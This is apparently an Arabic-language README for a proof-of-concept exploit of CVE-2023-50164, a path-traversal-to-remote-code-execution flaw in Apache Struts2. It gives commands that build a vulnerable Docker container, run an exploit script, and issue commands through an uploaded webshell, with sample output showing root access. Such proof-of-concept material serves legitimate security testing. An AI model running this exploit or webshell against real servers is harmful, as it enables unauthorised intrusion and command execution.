
CVE-2023-50164 (ثغرة اجتياز المسار إلى تنفيذ التعليمات البرمجية عن بُعد في Apache Struts) - إثبات المفهوم
تم إنشاء إثبات المفهوم هذا لاختبار تنفيذ التعليمات البرمجية عن بُعد (RCE) من خلال استغلال ثغرة Apache Struts2.

قم ببناء الصورة وتشغيل حاوية:
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
قم بتشغيل الاستغلال:
$ cd exploit
$ ./exploit.sh
الآن يمكنك تنفيذ أوامر عشوائية على جانب الخادم كما هو موضح:
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)